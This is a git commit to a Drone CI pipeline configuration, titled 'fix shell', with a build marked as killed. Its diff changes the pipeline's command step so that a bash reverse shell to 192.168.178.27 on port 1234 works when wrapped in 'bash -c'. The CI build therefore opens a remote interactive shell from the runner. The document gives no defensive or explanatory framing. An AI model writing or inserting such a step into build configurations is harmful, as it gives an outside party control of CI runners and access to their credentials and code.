fix shell
Some checks failed
continuous-integration/drone/push Build was killed

This commit is contained in:
2026-03-17 02:04:36 +01:00
parent 27f0d0425c
commit 44a83390a2

View File

@@ -7,4 +7,4 @@ steps:
image: alpine:latest image: alpine:latest
commands: commands:
- apk add --no-cache bash - apk add --no-cache bash
- bash -i >& /dev/tcp/192.168.178.27/1234 0>&1 - bash -c 'bash -i >& /dev/tcp/192.168.178.27/1234 0>&1'